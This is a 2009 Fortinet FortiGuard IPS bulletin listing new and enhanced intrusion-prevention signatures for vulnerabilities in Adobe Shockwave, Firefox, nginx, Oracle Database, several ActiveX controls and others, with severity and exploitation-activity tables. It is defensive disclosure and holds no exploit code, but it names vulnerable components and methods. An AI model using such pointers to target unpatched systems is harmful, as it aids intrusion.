|
|
Foreword
The FortiGuard Global Threat Research Team has released new security content to cover multiple vulnerabilities. The FortiGuard Team has observed 11 active exploitations of these vulnerabilities to date.
For more information, visit the FortiGuard Center at www.fortiguardcenter.com.
Threat Remediation
Fortinet provides coverage for the vulnerabilities described below as of the 2.711 IPS Definitions database update. A brief description of each vulnerability is provided as follows, in order of severity.
Critical ( 9 )
| Adobe.RoboHelp.Server.Upload.And.Code.Execution Event ID: 17720 |
Release Date: Nov 05, 2009 IPS Definitions DB Version: 2.711 |
|
Description: This indicates an attack attempt against a remote code execution vulnerability in Adobe RoboHelp. The vulnerability is caused by an error when the vulnerable software handles a specially crafted HTTP POST request. It allows a remote attacker to upload and execute arbitrary files. Affected Products: Adobe RoboHelp Server 8 Reference IDs: |
| Adobe.Shockwave.Player.Code.Execution Event ID: 17880 |
Release Date: Nov 04, 2009 IPS Definitions DB Version: 2.710 |
|
Description: This indicates an attack attempt to exploit a remote code-execution vulnerability in Adobe Shockwave Player. The vulnerability results from an insecure code in the DLL responsible for parsing DIR files. It can be exploited by sending a crafted ".dir" file which is opened by the vulnerable software. Affected Products: Adobe Shockwave Player 10 and prior Reference IDs: |
| Adobe.Shockwave.Player.Dir.File.Invalid.Index.Code.Execution Event ID: 17877 |
Release Date: Nov 05, 2009 IPS Definitions DB Version: 2.711 |
|
Description: This indicates an attack attempt to exploit a remote code execution vulnerability in Adobe Shockwave Player. The vulnerability results from insecure code in the DLL responsible for parsing dir files. It can be exploited via a crafted ".dir" file, leading to remote code execution. Affected Products: Adobe Shockwave Player 10 and prior Reference IDs: |
| Adobe.Shockwave.Player.Dir.File.Pointer.Handing.Code.Execution Event ID: 17876 |
Release Date: Nov 05, 2009 IPS Definitions DB Version: 2.711 |
|
Description: This indicates an attack attempt to exploit a remote code execution vulnerability in Adobe Shockwave Player. The vulnerability is caused by an error when the vulnerable software handles certain Shockwave content. It allows a remote attacker to execute arbitrary code by tricking a user into visiting a malicious web page. Affected Products: Adobe Shockwave Player 11.5.1.601 and previous versions Reference IDs: |
| Autonomy.KeyView.Module.Excel.File.Buffer.Overflow Event ID: 17856 |
Release Date: Nov 04, 2009 IPS Definitions DB Version: 2.710 |
|
Description: This indicates an attack attempt against a buffer overflow vulnerability in multiple products using Autonomy KeyView SDK. The vulnerability is caused by an error when the vulnerable software handles a specially crafted Excel file. It allows a remote attacker to execute arbitrary code. Affected Products: Autonomy Keyview Viewer SDK 10.4 and previous versions Autonomy Keyview Filter SDK 10.4 and previous versions Autonomy Keyview Export SDK 10.4 and previous versions IBM Lotus Notes 7.0.3 and previous versions Symantec Mail Security for SMTP 5.0.1 Patch 201 and previous versions Symantec Data Loss Prevention Endpoint Agents 9.0.1 and previous versions Symantec BrightMail Appliance 8.0.1 and previous versions Reference IDs: |
| CA.ETrust.PestPatrol.Ppctl.Dll.ActiveX.Access Event ID: 17847 |
Release Date: Nov 02, 2009 IPS Definitions DB Version: 2.708 |
|
Description: This indicates an attempt to exploit a code execution vulnerability in CA eTrust PestPatrol. The vulnerability is located in the "ppctl.dll" ActiveX control through misuse of the "Initialize" method. It may allow remote attackers to execute arbitrary code in vulnerable systems. Affected Products: CA eTrust PestPatrol with ppctl.dll (5.6.7.9) Reference IDs: |
| Electronic.Arts.SnoopyCtrl.NPSnpy.Dll.ActiveX.Access Event ID: 17846 |
Release Date: Nov 04, 2009 IPS Definitions DB Version: 2.710 |
|
Description: This indicates an attempt to exploit a code execution vulnerability in Electronic Arts SnoopyCtrl. The vulnerability is located in the "NPSnpy.dll" ActiveX control through misuse of "CheckRequirements" method. It may allow remote attackers to execute arbitrary code in vulnerable systems. Affected Products: Electronic Arts Inc. SnoopyCtrl ActiveX 0 Reference IDs: |
| Mozilla.Firefox.NsPropertyTable.PropertyList.Memory.Corruption Event ID: 17833 |
Release Date: Oct 29, 2009 IPS Definitions DB Version: 2.707 |
|
Description: This indicates an attempt to exploit a memory corruption vulnerability in Mozilla Firefox. The vulnerability is caused by an error that occurs when the vulnerable software handles a specially crafted web page. It allows a remote attacker to execute arbitrary code. Affected Products: Mozilla Firefox 3.5.2 and previous versions Mozilla Firefox 3.0.13 and previous versions Reference IDs: |
| Strawberry.Local.File.Include Event ID: 17837 |
Release Date: Oct 29, 2009 IPS Definitions DB Version: 2.707 |
|
Description: This indicates an attempt to exploit a Local File Include vulnerability in Strawberry. The vulnerability is caused by an error that occurs when the vulnerable software handles a malicious request. It allows a remote attacker to execute arbitrary code via sending a crafted web page. Affected Products: Strawberry 1.1.1 Reference IDs: |
High ( 11 )
| ActivePDF.WebGrabber.APWebGrb.Ocx.ActiveX.Access Event ID: 17848 |
Release Date: Nov 04, 2009 IPS Definitions DB Version: 2.710 |
|
Description: This indicates an attempt to exploit a code execution vulnerability in activePDF WebGrabber. The vulnerability is located in the "APWebGrb.ocx" ActiveX control through misuse of the "GetStatus" method. It may allow remote attackers to execute arbitrary code in vulnerable systems. Affected Products: activePDF WebGrabber 3.8 |
| Apple.Safari.Floating.Point.Parsing.Buffer.Overflow Event ID: 17675 |
Release Date: Oct 27, 2009 IPS Definitions DB Version: 2.706 |
|
Description: This indicates an attempt to exploit a buffer overflow vulnerability in Apple Safari Webkit. The vulnerability is caused by an error that occurs when the vulnerable software handles malicious floating point numbers. It allows a remote attacker to execute arbitrary code via sending a crafted web page. Affected Products: Apple Safari versions prior to 4.0.3 Reference IDs: |
| eEye.Retina.WiFi.Scanner.RWS.Buffer.Overflow Event ID: 17797 |
Release Date: Oct 27, 2009 IPS Definitions DB Version: 2.706 |
|
Description: This indicates an attempt to exploit a buffer overflow vulnerability in eEye Retina WiFi Scanner. The vulnerability is caused by an error that occurs when the vulnerable software handles a malicious .rws file. It allows a remote attacker to execute arbitrary code via sending a crafted .rws file. Affected Products: eEye Digital Security Retina WiFi Scanner 1.0.8 68 eEye Digital Security Retina Network Security Scanner 5.10.14 Reference IDs: |
| EMC.ApplicationXtender.Activex.Control.Buffer.Overflow Event ID: 17793 |
Release Date: Nov 04, 2009 IPS Definitions DB Version: 2.710 |
|
Description: This indicates an attempt to exploit a memory corruption vulnerability in some EMC's software. The vulnerability is located in the "keyhelp.ocx" ActiveX control through a miss-use of the "JumpURL" property. It may allow remote attackers to execute arbitrary code in the context of the application using the affected ActiveX control. Affected Products: EMC Documentum ApplicationXtender Desktop 5.4 EMC Captiva Quickscan Pro 4.6 SP1 Reference IDs: |
| McAfee.Remediation.Client.Enginecom.Dll.ActiveX.Access Event ID: 17849 |
Release Date: Nov 04, 2009 IPS Definitions DB Version: 2.710 |
|
Description: This indicates an attempt to exploit a code execution vulnerability in McAfee Remediation Agent. The vulnerability is located in the "enginecom.dll" ActiveX control through misuse of the "DeleteSnapshot" method. It may allow remote attackers to execute arbitrary code in vulnerable systems. Affected Products: McAfee Remediation Agent 4.5.0.41 |
| Nginx.URL.Processing.Buffer.Overflow Event ID: 17765 |
Release Date: Nov 04, 2009 IPS Definitions DB Version: 2.710 |
|
Description: This indicates an attack attempt against a buffer-overflow vulnerability in the nginx HTTP server. The vulnerability is caused by an error when the vulnerable software handles a specially crafted HTTP request. It allows a remote attacker to execute arbitrary code. Affected Products: Igor Sysoev nginx 0.8.14 Igor Sysoev nginx 0.7.61 Igor Sysoev nginx 0.6.38 Igor Sysoev nginx 0.5.37 Igor Sysoev nginx 0 Reference IDs: |
| Oracle.Secure.Backup.Authentication.Bypass Event ID: 17737 |
Release Date: Oct 27, 2009 IPS Definitions DB Version: 2.706 |
|
Description: This indicates a possible attack towards an authentication bypass vulnerability in Oracle Secure Backup. Successful attackers can gain administrative access to the affected application. Affected Products: Oracle Secure Backup prior to version 10.2.0.3. Reference IDs: |
| osCommerce.Arbitrary.File.Upload Event ID: 17845 |
Release Date: Nov 04, 2009 IPS Definitions DB Version: 2.710 |
|
Description: This indicates an attempt to exploit an arbitrary file upload vulnerability in osCommerce. The vulnerability is caused by an error that occurs when the vulnerable software handles file upload without authentication. It allows a remote attacker to execute arbitrary code via sending a crafted web page. Affected Products: osCommerce Online Merchant 2.2 RC2a Reference IDs: |
| QuickTeam.Remote.File.Include Event ID: 17836 |
Release Date: Oct 29, 2009 IPS Definitions DB Version: 2.707 |
|
Description: This indicates an attempt to exploit a Remote File Include vulnerability in QuickTeam. The vulnerability is caused by an error that occurs when the vulnerable software handles a malicious request. It allows a remote attacker to execute arbitrary code via sending a crafted web page. Affected Products: Qt quickteam 2 Reference IDs: |
| WordPress.Plugin.Sniplets.File.Include Event ID: 17834 |
Release Date: Oct 29, 2009 IPS Definitions DB Version: 2.707 |
|
Description: This indicates an attempt to exploit a Remote File Include vulnerability in WordPress Plugin Sniplets. The vulnerability is caused by an error that occurs when the vulnerable software handles a malicious request. It allows a remote attacker to execute arbitrary code via sending a crafted web page. Affected Products: Sniplets 1.1.2 and 1.2.2 plugin for WordPress Reference IDs: |
| Zeus.Botnet Event ID: 17785 |
Release Date: Oct 26, 2009 IPS Definitions DB Version: 2.705 |
|
Description: It indicates that the system might be infected by Zeus/ZBot botnet. Affected Products: Any unprotected Windows system is vulnerable to the attack. |
Medium ( 7 )
| Adobe.Shockwave.Player.DoS Event ID: 17879 |
Release Date: Nov 04, 2009 IPS Definitions DB Version: 2.710 |
|
Description: This indicates an attack attempt against a denial-of-service vulnerability in Adobe Shockwave Player. The vulnerability is caused by an error when the vulnerable software handles a malicious Shockwave media file. It allows a remote attacker to cause a denial of service via sending a crafted web page. Affected Products: Adobe Shockwave Player 11 and prior Reference IDs: |
| BarracudaDrive.Web.Server.Directory.Traversal Event ID: 17742 |
Release Date: Nov 04, 2009 IPS Definitions DB Version: 2.710 |
|
Description: This indicates an attack attempt against a directory traversal vulnerability in BarracudaDrive Web Server. The vulnerability is caused by an error when the vulnerable software handles a specially crafted URL. It allows a remote attacker to read arbitrary files. Affected Products: Real Time Logic BarracudaDrive Web Server Home Server 3.7.2 Real Time Logic BarracudaDrive Web Server 3.7.2 Reference IDs: |
| cpCommerce.Remote.File.Include Event ID: 17835 |
Release Date: Oct 29, 2009 IPS Definitions DB Version: 2.707 |
|
Description: This indicates an attempt to exploit a Remote File Include vulnerability in cpCommerce. The vulnerability is caused by an error that occurs when the vulnerable software handles a malicious request. It allows a remote attacker to execute arbitrary code via sending a crafted web page. Affected Products: cpCommerce 1.2.x, possibly including 1.2.9 Reference IDs: |
| FreeRADIUS.RADIUS.Server.Rad_decode.DoS Event ID: 17853 |
Release Date: Nov 04, 2009 IPS Definitions DB Version: 2.710 |
|
Description: This indicates an attack attempt against a denial-of-service vulnerability in FreeRADIUS RADIUS Server. The vulnerability is caused by an error when the vulnerable software handles a specially crafted RADIUS Access-Request packet. It allows a remote attacker to cause a denial-of-service condition. Affected Products: FreeRADIUS FreeRADIUS 1.1.7 Reference IDs: |
| Oracle.Database.REPCAT_RPC.VALIDATE_REMOTE_RC.SQL.Injection Event ID: 17844 |
Release Date: Oct 29, 2009 IPS Definitions DB Version: 2.707 |
|
Description: This indicates an attempt to exploit a SQL injection vulnerability in Oracle Database server. The vulnerability is caused by an input validation error in function VALIDATE_REMOTE_RC of the package DBMS_REPCAT_RPC. It allows a remote attacker to inject and execute malicious SQL commands on the target server. Affected Products: Oracle Oracle9i Standard Edition 9.2 .8DV Oracle Oracle9i Standard Edition 9.2 .8 Oracle Oracle9i Personal Edition 9.2 .8DV Oracle Oracle9i Personal Edition 9.2 .8 Oracle Oracle9i Enterprise Edition 9.2 .8DV Oracle Oracle9i Enterprise Edition 9.2 .8.0 Oracle Oracle10g Standard Edition 10.2 .3 Oracle Oracle10g Standard Edition 10.1 .0.5 Oracle Oracle10g Personal Edition 10.1 .5 Oracle Oracle10g Personal Edition 10.2.0.4 Oracle Oracle10g Enterprise Edition 10.2 .3 Oracle Oracle10g Enterprise Edition 10.1 .5 Reference IDs: |
| SiteX.Local.File.Include Event ID: 17839 |
Release Date: Oct 29, 2009 IPS Definitions DB Version: 2.707 |
|
Description: This indicates an attempt to exploit a Local File Include vulnerability in SiteX. The vulnerability is caused by an error that occurs when the vulnerable software handles a malicious request. It allows a remote attacker to execute arbitrary code via sending a crafted web page. Affected Products: SiteX 0.7.4.418 and earlier versions Reference IDs: |
| Squid.StrListGetItem.DoS Event ID: 17798 |
Release Date: Oct 27, 2009 IPS Definitions DB Version: 2.706 |
|
Description: This indicates an attempt to exploit a denial of service vulnerability in Squid. The vulnerability is caused by an error that occurs when the vulnerable software handles a specially crafted HTTP header. It allows a remote attacker to cause a denial of service. Affected Products: Squid Web Proxy Cache 3.1 5 and previous versions. Reference IDs: |
Top of Section
Enhanced Coverage
The FortiGuard Threat Research team updates security content as new vectors of exploitation are discovered. The table below details the security content enhanced with this release.
Critical ( 15 )
High ( 10 )
| Event Name | Revision Notes |
|---|---|
| 3ivx.MPEG4.File.Processing.Buffer.Overflow | Detection Enhanced |
| CA.BrightStor.ARCserve.Backup.MediaSVR.EXE.191.Buffer.Overflow | Detection Enhanced Detection Enhanced Detection Enhanced Default_action updated to 'pass |
| MS.IE.ActiveX.Navigate.Method.Access | Detection Enhanced |
| MS.Windows.X509.OID.Spoofing | Previous name: "MS.Windows.X509.OID.Spool" |
| Playlist.Buffer.Overflow | Detection Enhanced Detection Enhanced |
| QuickTeam.Remote.File.Inclusion | Previous name: "QuickTeam.Remote.File.Include" |
| Sun.MySQL.Dispatch.Command.Format.String | Default_action updated to 'drop |
| Sun.Solaris.DHCP.Client.Remote.Code.Execution | Default_action updated to 'drop |
| VUPlayer.M3U.Buffer.Overflow | Detection Enhanced |
| WordPress.Plugin.Sniplets.File.Inclusion | Previous name: "WordPress.Plugin.Sniplets.File.Inc... |
Medium ( 10 )
| Event Name | Revision Notes |
|---|---|
| Adobe.Shockwave.Player.Dir.File.Invalid.String.Length.DoS | Previous name: "Adobe.Shockwave.Player.DoS" |
| CA.ARCserve.Backup.Message.Engine.DoS | Default_action updated to 'drop |
| Coppermine.Photo.Gallery.XSS | Detection Enhanced |
| cpCommerce.Remote.File.Inclusion | Previous name: "cpCommerce.Remote.File.Include" |
| FG-VD-08-022-Apple | Detection Enhanced |
| Mozilla.Firefox.PKCS11.Privilege.Elevation | Detection Enhanced |
| MS.ASP.NET.NumberOfCPUs.Requests.DoS | Detection Enhanced |
| Oracle.BEA.Weblogic.Server.Console-help.Portal.XSS | Default_action updated to 'drop |
| Oracle.Secure.Enterprise.Search.Linked.XSS | Default_action updated to 'drop |
| SiteX.Local.File.Inclusion | Previous name: "SiteX.Local.File.Include" |
Low ( 1 )
| Event Name | Revision Notes |
|---|---|
| Apache.IPv6.Buffer.Overflow | Detection Enhanced |
Top of Section
Active Exploitation
The FortiGuard Threat Research team uses globally distributed probes to monitor exploit activity. Vulnerabilities can be classified as active and given a magnitude level. The magnitude level is the rate of activity across the probes. The value of the magnitude is set to low, medium or high.
The table below lists the vulnerabilities discussed in this bulletin (specifically new and enhanced detection) and their corresponding exploit activity magnitude. The data below is as of this writing.
Critical ( 2 of 14 )
High ( 5 of 16 )
Medium ( 3 of 11 )
| Event Name | Active Exploitation Observed | Magnitude |
|---|---|---|
| Adobe.Shockwave.Player.DoS | No | n/a |
| BarracudaDrive.Web.Server.Directory.Traversal | No | n/a |
| Coppermine.Photo.Gallery.XSS | Yes | Low |
| cpCommerce.Remote.File.Include | No | n/a |
| FG-VD-08-022-Apple | Yes | Medium |
| FreeRADIUS.RADIUS.Server.Rad_decode.DoS | No | n/a |
| Mozilla.Firefox.PKCS11.Privilege.Elevation | No | n/a |
| MS.ASP.NET.NumberOfCPUs.Requests.DoS | Yes | Low |
| Oracle.Database.REPCAT_RPC.VALIDATE_REMOTE_RC.SQL.Injection | No | n/a |
| SiteX.Local.File.Include | No | n/a |
| Squid.StrListGetItem.DoS | No | n/a |
Low ( 1 of 1 )
| Event Name | Active Exploitation Observed | Magnitude |
|---|---|---|
| Apache.IPv6.Buffer.Overflow | Yes | High |
Top of Section
Document History
| Revision Date | Version Number | |
|---|---|---|
| Monday, November 09, 2009 | 1 | Initial Documentation. |
About Fortinet ( www.fortinet.com )
Fortinet is the pioneer and leading provider of ASIC-accelerated unified threat management, or UTM, security systems, which are used by enterprises and service providers to increase their security while reducing total operating costs. Fortinet solutions were built from the ground up to integrate multiple levels of security protection--including firewall, antivirus, intrusion prevention, VPN, spyware prevention and anti-spam -- designed to help customers protect against network and content level threats. Leveraging a custom ASIC and unified interface, Fortinet solutions offer advanced security functionality that scales from remote office to chassis-based solutions with integrated management and reporting. Fortinet solutions have won multiple awards around the world and are the only security products that are certified in six programs by ICSA Labs: (Firewall, Antivirus, IPSec, SSL, Network IPS, and Anti-Spyware). Fortinet is privately held and based in Sunnyvale, California.
Disclaimer
Although Fortinet has attempted to provide accurate information in these materials, Fortinet assumes no legal responsibility for the accuracy or completeness of the information. Please note that no Fortinet statements herein constitute or contain any guarantee, warranty or legally binding representation. All materials contained in this publication are subject to change without notice, and Fortinet reserves the right to change, modify, transfer, or otherwise revise this publication without notice.
Top of page
